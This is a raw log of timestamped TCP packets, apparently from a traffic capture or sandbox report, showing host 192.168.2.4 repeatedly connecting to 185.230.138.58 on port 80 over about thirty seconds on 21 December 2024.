                                                                                                                                        Dec 21, 2024 10:10:09.166704893 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:09.166872978 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:09.167073011 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:09.286585093 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:09.514945030 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:09.634835958 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:10.411156893 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:10.452240944 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.645369053 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:10.686629057 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.797454119 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.798121929 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.917445898 CET8050135185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:10.917495012 CET5013580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.918067932 CET8050136185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:10.918138981 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:10.918448925 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.038815975 CET8050136185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:11.268635035 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.389188051 CET8050136185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:11.859790087 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.859791040 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.978657007 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.981517076 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:11.981880903 CET8050136185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:11.981985092 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.981986046 CET5013680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:11.982115984 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:12.098531008 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:12.098752975 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:12.099220991 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:12.101711988 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:12.218863010 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:12.327358007 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:12.447407007 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:12.447827101 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:12.452347994 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:12.572112083 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.228195906 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.282681942 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.342699051 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.391227007 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.461141109 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.514974117 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.577071905 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.624445915 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.697098970 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.697107077 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.697107077 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.816993952 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.817195892 CET8050138185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.817306995 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.817315102 CET5013880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.817478895 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.818109035 CET8050137185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:13.818763018 CET5013780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:13.937014103 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:14.171308041 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:14.291040897 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.071376085 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.124181032 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.309256077 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.310720921 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.430783987 CET8050139185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.430977106 CET5013980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.434791088 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.554462910 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.556886911 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.556886911 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:15.676587105 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:15.906862974 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:16.026714087 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:16.802241087 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:16.842956066 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.041100979 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:17.092936993 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.165034056 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.165043116 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.285620928 CET8050141185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:17.285738945 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.285904884 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.286009073 CET8050140185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:17.286634922 CET5014080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.406343937 CET8050141185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:17.640804052 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:17.760588884 CET8050141185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.468993902 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.469014883 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.534904003 CET8050141185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.535077095 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.588725090 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.588808060 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.589029074 CET8050141185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.589123011 CET5014180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.589185953 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.593005896 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.708805084 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.712649107 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.712845087 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.712845087 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:18.832525969 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:18.936825037 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:19.056565046 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:19.056598902 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:19.061937094 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:19.181821108 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:19.842557907 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:19.892730951 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:19.959161043 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.016736984 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.077302933 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.124725103 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.193222046 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.233592033 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.316729069 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.316831112 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.317054033 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.437539101 CET8050142185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.437614918 CET5014280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.437640905 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.437705040 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.437861919 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.437891006 CET8050143185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.437952995 CET5014380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.557427883 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:20.796500921 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:20.916265965 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:21.682683945 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:21.736742973 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:21.921137094 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:21.928755045 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.043750048 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.049113035 CET8050144185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:22.049252987 CET5014480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.163580894 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:22.163662910 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.163795948 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.283540964 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:22.514970064 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:22.634784937 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:23.411614895 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:23.468192101 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.645170927 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:23.696265936 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.797573090 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.797600985 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.917354107 CET8050146185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:23.917457104 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.917579889 CET8050145185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:23.917617083 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:23.917711020 CET5014580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:24.037187099 CET8050146185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:24.264980078 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:24.385852098 CET8050146185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.093899965 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.094333887 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.168272018 CET8050146185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.168410063 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.213877916 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.213943958 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.214099884 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.214190006 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.214236021 CET8050146185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.214602947 CET5014680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.333626986 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.333745003 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.333841085 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.334287882 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.453972101 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.562796116 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.682626009 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.682678938 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:25.687360048 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:25.808166027 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:26.461956978 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:26.514929056 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.588247061 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:26.639916897 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.701308012 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:26.749290943 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.821270943 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:26.874288082 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.952615976 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.952683926 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:26.953228951 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.072666883 CET8050147185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:27.072748899 CET5014780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.072910070 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:27.072978020 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.073088884 CET8050148185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:27.073102951 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.073169947 CET5014880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.192635059 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:27.421498060 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:27.541325092 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:28.671343088 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:28.718070030 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:28.905266047 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:28.952449083 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.032763004 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.032888889 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.153790951 CET8050149185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:29.153867960 CET5014980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.153924942 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:29.154097080 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.154234886 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.274274111 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:29.500844955 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:29.620577097 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:30.398605108 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:30.452440023 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.633328915 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:30.686821938 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.765574932 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.765897036 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.885601044 CET8050151185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:30.885643959 CET8050150185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:30.885672092 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.885700941 CET5015080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:30.885894060 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.005713940 CET8050151185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.233916044 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.353683949 CET8050151185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.703423977 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.703517914 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.823632956 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.823807955 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.823893070 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.828428984 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.859518051 CET8050151185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.859612942 CET5015180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.943500042 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.948107958 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:31.949209929 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:31.949347973 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:32.068913937 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:32.171351910 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:32.291254997 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:32.291302919 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:32.296297073 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:32.416081905 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.073298931 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.124416113 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.207031012 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.249377012 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.309542894 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.360848904 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.445369959 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.499378920 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.574425936 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.574625969 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.576839924 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.694545031 CET8050152185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.694968939 CET8050153185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.696460962 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:33.696568012 CET5015280192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.696569920 CET5015380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.696675062 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.696851969 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:33.816443920 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:34.048870087 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:34.168737888 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:34.941710949 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:34.983758926 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.177434921 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:35.177687883 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.296992064 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.297983885 CET8050154185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:35.304850101 CET5015480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.416815042 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:35.417078018 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.417078972 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.538060904 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:35.768981934 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:35.888953924 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:36.665487051 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:36.718144894 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:36.897546053 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:36.952548027 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.016730070 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.017038107 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.136698008 CET8050156185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:37.136799097 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.136925936 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.137012005 CET8050155185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:37.137100935 CET5015580192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.256587029 CET8050156185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:37.484890938 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:37.604727030 CET8050156185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.328547955 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.328558922 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.384809971 CET8050156185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.384881020 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.448652983 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.448730946 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.448805094 CET8050156185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.448857069 CET5015680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.448887110 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.452311039 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.568619013 CET8050157185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.571882010 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.571965933 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.572237015 CET5015880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.691987991 CET8050158185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:10:38.796400070 CET5015780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:10:38.916286945 CET8050157185.230.138.58192.168.2.4
